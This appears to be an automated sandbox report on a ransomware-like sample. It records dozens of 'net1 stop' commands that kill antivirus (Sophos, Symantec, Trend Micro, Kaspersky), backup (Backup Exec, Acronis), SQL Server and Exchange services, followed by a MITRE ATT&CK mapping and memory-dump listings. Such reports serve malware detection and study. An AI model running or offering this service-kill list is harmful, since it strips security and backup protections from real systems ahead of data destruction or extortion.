C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:16088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:16080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:16072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:16064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:16056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:16048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:16040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:16032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:16024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:16016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:16008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:16000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:15992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:15984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:15976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:15968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:15952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:15956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:8604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:5564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:15884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:15876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:15868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:15860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:15852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:15844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:15836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:15704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:15696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:15680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:15656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:15648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:15640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:15632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:15616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:15608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:15600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:15584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:15576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:15568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:15544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:15528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:15512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:14844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:14812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/580-123-0x000002BE43CA0000-0x000002BE43CA1000-memory.dmp

Filesize
4KB

Download
memory/580-124-0x000002BE27E50000-0x000002BE27E52000-memory.dmp

Filesize
8KB

Download
memory/580-129-0x000002BE43E50000-0x000002BE43E51000-memory.dmp

Filesize
4KB

Download
memory/580-125-0x000002BE27E53000-0x000002BE27E55000-memory.dmp

Filesize
8KB

Download
memory/580-153-0x000002BE27E56000-0x000002BE27E58000-memory.dmp

Filesize
8KB

Download
memory/616-179-0x00000274EDFB3000-0x00000274EDFB5000-memory.dmp

Filesize
8KB

Download
memory/616-292-0x00000274EDFB8000-0x00000274EDFB9000-memory.dmp

Filesize
4KB

Download
memory/616-247-0x00000274EDFB6000-0x00000274EDFB8000-memory.dmp

Filesize
8KB

Download
memory/616-193-0x00000274EDFB0000-0x00000274EDFB2000-memory.dmp

Filesize
8KB

Download
memory/904-114-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/904-116-0x000000001AFD0000-0x000000001AFD2000-memory.dmp

Filesize
8KB

Download
memory/1516-293-0x0000021840B58000-0x0000021840B59000-memory.dmp

Filesize
4KB

Download
memory/1516-276-0x0000021840B56000-0x0000021840B58000-memory.dmp

Filesize
8KB

Download
memory/1516-205-0x0000021840B50000-0x0000021840B52000-memory.dmp

Filesize
8KB

Download
memory/1516-206-0x0000021840B53000-0x0000021840B55000-memory.dmp

Filesize
8KB

Download
memory/1604-208-0x00000171BD0B0000-0x00000171BD0B2000-memory.dmp

Filesize
8KB

Download
memory/1604-209-0x00000171BD0B3000-0x00000171BD0B5000-memory.dmp

Filesize
8KB

Download
memory/1604-280-0x00000171BD0B6000-0x00000171BD0B8000-memory.dmp

Filesize
8KB

Download
memory/1604-294-0x00000171BD0B8000-0x00000171BD0B9000-memory.dmp

Filesize
4KB

Download
memory/2172-298-0x00000211F5E38000-0x00000211F5E39000-memory.dmp

Filesize
4KB

Download
memory/2172-283-0x00000211F5E36000-0x00000211F5E38000-memory.dmp

Filesize
8KB

Download
memory/2172-218-0x00000211F5E30000-0x00000211F5E32000-memory.dmp

Filesize
8KB

Download
memory/2172-222-0x00000211F5E33000-0x00000211F5E35000-memory.dmp

Filesize
8KB

Download
memory/2200-220-0x00000154D0036000-0x00000154D0038000-memory.dmp

Filesize
8KB

Download
memory/2200-181-0x00000154D0033000-0x00000154D0035000-memory.dmp

Filesize
8KB

Download
memory/2200-279-0x00000154D0038000-0x00000154D0039000-memory.dmp

Filesize
4KB

Download
memory/2200-176-0x00000154D0030000-0x00000154D0032000-memory.dmp

Filesize
8KB

Download
memory/2244-184-0x0000023AA8120000-0x0000023AA8122000-memory.dmp

Filesize
8KB

Download
memory/2244-245-0x0000023AA8126000-0x0000023AA8128000-memory.dmp

Filesize
8KB

Download
memory/2244-185-0x0000023AA8123000-0x0000023AA8125000-memory.dmp

Filesize
8KB

Download
memory/2244-291-0x0000023AA8128000-0x0000023AA8129000-memory.dmp

Filesize
4KB

Download
memory/3548-229-0x000002369A263000-0x000002369A265000-memory.dmp

Filesize
8KB

Download
memory/3548-284-0x000002369A266000-0x000002369A268000-memory.dmp

Filesize
8KB

Download
memory/3548-227-0x000002369A260000-0x000002369A262000-memory.dmp

Filesize
8KB

Download
memory/3548-297-0x000002369A268000-0x000002369A269000-memory.dmp

Filesize
4KB

Download
memory/3612-282-0x000001B63A538000-0x000001B63A539000-memory.dmp

Filesize
4KB

Download
memory/3612-189-0x000001B63A530000-0x000001B63A532000-memory.dmp

Filesize
8KB

Download
memory/3612-191-0x000001B63A533000-0x000001B63A535000-memory.dmp

Filesize
8KB

Download
memory/3612-233-0x000001B63A536000-0x000001B63A538000-memory.dmp

Filesize
8KB

Download
memory/3828-281-0x0000025E684A6000-0x0000025E684A8000-memory.dmp

Filesize
8KB

Download
memory/3828-215-0x0000025E684A0000-0x0000025E684A2000-memory.dmp

Filesize
8KB

Download
memory/3828-216-0x0000025E684A3000-0x0000025E684A5000-memory.dmp

Filesize
8KB

Download
memory/3828-296-0x0000025E684A8000-0x0000025E684A9000-memory.dmp

Filesize
4KB

Download
memory/4212-286-0x0000017811406000-0x0000017811408000-memory.dmp

Filesize
8KB

Download
memory/4212-234-0x0000017811403000-0x0000017811405000-memory.dmp

Filesize
8KB

Download
memory/4212-301-0x0000017811408000-0x0000017811409000-memory.dmp

Filesize
4KB

Download
memory/4212-231-0x0000017811400000-0x0000017811402000-memory.dmp

Filesize
8KB

Download
memory/4348-300-0x000001841B628000-0x000001841B629000-memory.dmp

Filesize
4KB

Download
memory/4348-211-0x000001841B620000-0x000001841B622000-memory.dmp

Filesize
8KB

Download
memory/4348-287-0x000001841B626000-0x000001841B628000-memory.dmp

Filesize
8KB

Download
memory/4348-213-0x000001841B623000-0x000001841B625000-memory.dmp

Filesize
8KB

Download
memory/4476-304-0x000001DA6EBA8000-0x000001DA6EBA9000-memory.dmp

Filesize
4KB

Download
memory/4476-223-0x000001DA6EBA0000-0x000001DA6EBA2000-memory.dmp

Filesize
8KB

Download
memory/4476-225-0x000001DA6EBA3000-0x000001DA6EBA5000-memory.dmp

Filesize
8KB

Download
memory/4476-285-0x000001DA6EBA6000-0x000001DA6EBA8000-memory.dmp

Filesize
8KB

Download
memory/5336-288-0x0000025AA0390000-0x0000025AA0392000-memory.dmp

Filesize
8KB

Download
memory/5336-289-0x0000025AA0393000-0x0000025AA0395000-memory.dmp

Filesize
8KB

Download
memory/5336-364-0x0000025AA0398000-0x0000025AA0399000-memory.dmp

Filesize
4KB

Download
memory/5336-303-0x0000025AA0396000-0x0000025AA0398000-memory.dmp

Filesize
8KB

Download
memory/10380-278-0x0000020867123000-0x0000020867125000-memory.dmp

Filesize
8KB

Download
memory/10380-277-0x0000020867120000-0x0000020867122000-memory.dmp

Filesize
8KB

Download
memory/10380-299-0x0000020867126000-0x0000020867128000-memory.dmp

Filesize
8KB

Download